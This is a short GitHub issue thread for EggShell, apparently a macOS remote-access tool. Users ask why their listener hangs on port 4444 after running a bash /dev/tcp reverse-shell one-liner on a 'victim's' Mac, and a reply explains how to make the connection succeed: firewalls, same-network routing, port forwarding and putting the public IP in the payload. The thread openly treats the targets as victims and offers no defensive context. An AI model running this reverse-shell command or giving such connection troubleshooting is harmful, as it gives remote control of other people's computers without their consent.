EggShell icon indicating copy to clipboard operation
EggShell copied to clipboard

My console stuck in Listening on port 4444...

Open mikk146m opened this issue 7 years ago • 2 comments
trafficstars

Can anybody help me? My console is stuck in my console stuck in "Listening on port 4444...", I have entered the "bash &> /dev/tcp/"my IP"/4444 0>&1" on the victims' mac? Thanks in advanced :-)

mikk146m avatar Jul 09 '18 15:07 mikk146m

I have the same problem because my victim's mac refuses to connect and says operation times out.

DeDogeGod avatar Jul 17 '18 13:07 DeDogeGod

There may be a firewall in place blocking the connection. You also need to be on the same network (so the local IP address routes correctly) or have your server port forwarded and the payload contain your public IP. If its on the same network, check there is nothing blocking it by testing it with something like netcat.

hammi1 avatar Jan 16 '19 15:01 hammi1